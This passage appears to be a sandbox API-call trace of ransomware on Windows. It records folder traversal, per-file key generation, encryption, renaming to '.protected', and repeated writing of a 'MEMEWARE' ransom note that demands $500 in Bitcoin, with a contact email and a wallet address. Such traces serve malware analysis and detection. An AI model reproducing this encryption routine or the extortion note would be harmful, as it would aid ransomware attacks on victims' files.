[0066.568] lstrcmpW (lpString1="Media Player", lpString2=".") returned 1 [0066.568] lstrcmpW (lpString1="Media Player", lpString2="..") returned 1 [0066.568] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\*") returned 43 [0066.568] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0066.568] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.568] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.568] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.569] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.569] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.569] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\.") returned 43 [0066.569] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.569] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.569] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.569] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.569] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.569] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.569] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.569] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\..") returned 44 [0066.569] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.569] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.569] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0066.569] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0066.569] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\RESTORE_FILES.txt") returned 59 [0066.569] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\media player\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0066.569] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.569] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0066.570] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.570] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0066.570] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.570] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0066.571] CloseHandle (hObject=0xa4) returned 1 [0066.571] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0066.571] lstrcmpiW (lpString1="MF", lpString2="Windows") returned -1 [0066.571] lstrcmpiW (lpString1="MF", lpString2="Program Files") returned -1 [0066.571] lstrcmpiW (lpString1="MF", lpString2="Program Files (x86)") returned -1 [0066.571] lstrcmpiW (lpString1="MF", lpString2="$Recycle.bin") returned 1 [0066.571] lstrcmpiW (lpString1="MF", lpString2="System Volume Information") returned -1 [0066.571] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF") returned 31 [0066.571] lstrcmpW (lpString1="MF", lpString2=".") returned 1 [0066.571] lstrcmpW (lpString1="MF", lpString2="..") returned 1 [0066.571] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*") returned 33 [0066.571] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0066.571] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.571] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.571] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.571] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.572] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.572] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\.") returned 33 [0066.572] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.572] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.572] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.572] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.572] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.572] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.572] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.572] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\..") returned 34 [0066.572] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.572] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.572] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.572] lstrcmpiW (lpString1="Active.GRL", lpString2="Windows") returned -1 [0066.572] lstrcmpiW (lpString1="Active.GRL", lpString2="Program Files") returned -1 [0066.572] lstrcmpiW (lpString1="Active.GRL", lpString2="Program Files (x86)") returned -1 [0066.572] lstrcmpiW (lpString1="Active.GRL", lpString2="$Recycle.bin") returned 1 [0066.572] lstrcmpiW (lpString1="Active.GRL", lpString2="System Volume Information") returned -1 [0066.572] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL") returned 42 [0066.572] StrStrIW (lpFirst="Active.GRL", lpSrch=".protected") returned 0x0 [0066.572] lstrcmpW (lpString1="Active.GRL", lpString2="RESTORE_FILES.txt") returned -1 [0066.572] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0066.572] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0066.572] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.572] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL") returned 42 [0066.573] StrStrW (lpFirst="Active.GRL", lpSrch=".txt") returned 0x0 [0066.573] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL") returned 42 [0066.573] StrStrW (lpFirst="Active.GRL", lpSrch=".rar") returned 0x0 [0066.573] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL") returned 42 [0066.573] StrStrW (lpFirst="Active.GRL", lpSrch=".zip") returned 0x0 [0066.573] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.592] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.592] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.592] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.592] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0066.606] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0066.606] CloseHandle (hObject=0xb4) returned 1 [0066.607] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL.protected") returned 52 [0066.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL.protected" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl.protected")) returned 1 [0066.607] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.607] lstrcmpiW (lpString1="Pending.GRL", lpString2="Windows") returned -1 [0066.607] lstrcmpiW (lpString1="Pending.GRL", lpString2="Program Files") returned -1 [0066.607] lstrcmpiW (lpString1="Pending.GRL", lpString2="Program Files (x86)") returned -1 [0066.607] lstrcmpiW (lpString1="Pending.GRL", lpString2="$Recycle.bin") returned 1 [0066.607] lstrcmpiW (lpString1="Pending.GRL", lpString2="System Volume Information") returned -1 [0066.607] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL") returned 43 [0066.607] StrStrIW (lpFirst="Pending.GRL", lpSrch=".protected") returned 0x0 [0066.607] lstrcmpW (lpString1="Pending.GRL", lpString2="RESTORE_FILES.txt") returned -1 [0066.607] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0066.608] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0066.608] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.608] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL") returned 43 [0066.608] StrStrW (lpFirst="Pending.GRL", lpSrch=".txt") returned 0x0 [0066.608] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL") returned 43 [0066.608] StrStrW (lpFirst="Pending.GRL", lpSrch=".rar") returned 0x0 [0066.608] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL") returned 43 [0066.608] StrStrW (lpFirst="Pending.GRL", lpSrch=".zip") returned 0x0 [0066.608] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.623] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.623] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.624] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.624] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0066.688] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0066.689] CloseHandle (hObject=0xb4) returned 1 [0066.689] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL.protected") returned 53 [0066.689] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL.protected" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl.protected")) returned 1 [0066.690] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0066.690] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0066.690] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\RESTORE_FILES.txt") returned 49 [0066.690] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\mf\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0066.690] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.690] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0066.691] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.691] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0066.691] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.691] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0066.691] CloseHandle (hObject=0xa4) returned 1 [0066.691] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0066.691] lstrcmpiW (lpString1="MSDN", lpString2="Windows") returned -1 [0066.691] lstrcmpiW (lpString1="MSDN", lpString2="Program Files") returned -1 [0066.691] lstrcmpiW (lpString1="MSDN", lpString2="Program Files (x86)") returned -1 [0066.691] lstrcmpiW (lpString1="MSDN", lpString2="$Recycle.bin") returned 1 [0066.691] lstrcmpiW (lpString1="MSDN", lpString2="System Volume Information") returned -1 [0066.691] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN") returned 33 [0066.691] lstrcmpW (lpString1="MSDN", lpString2=".") returned 1 [0066.691] lstrcmpW (lpString1="MSDN", lpString2="..") returned 1 [0066.691] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\*") returned 35 [0066.691] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0066.810] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.810] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.810] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.810] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.810] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.810] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\.") returned 35 [0066.810] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.810] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.810] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.810] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.810] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.810] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.810] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.810] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\..") returned 36 [0066.810] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.810] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.810] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.810] lstrcmpiW (lpString1="8.0", lpString2="Windows") returned -1 [0066.810] lstrcmpiW (lpString1="8.0", lpString2="Program Files") returned -1 [0066.811] lstrcmpiW (lpString1="8.0", lpString2="Program Files (x86)") returned -1 [0066.811] lstrcmpiW (lpString1="8.0", lpString2="$Recycle.bin") returned 1 [0066.811] lstrcmpiW (lpString1="8.0", lpString2="System Volume Information") returned -1 [0066.811] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0") returned 37 [0066.811] lstrcmpW (lpString1="8.0", lpString2=".") returned 1 [0066.811] lstrcmpW (lpString1="8.0", lpString2="..") returned 1 [0066.811] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0\\*") returned 39 [0066.811] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0066.811] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.811] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.811] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.811] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.811] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.811] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0\\.") returned 39 [0066.811] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.811] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0066.811] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.811] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.811] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.811] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.811] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.811] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0\\..") returned 40 [0066.811] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.811] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.811] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0066.811] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0066.812] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0\\RESTORE_FILES.txt") returned 55 [0066.812] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\msdn\\8.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.813] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL 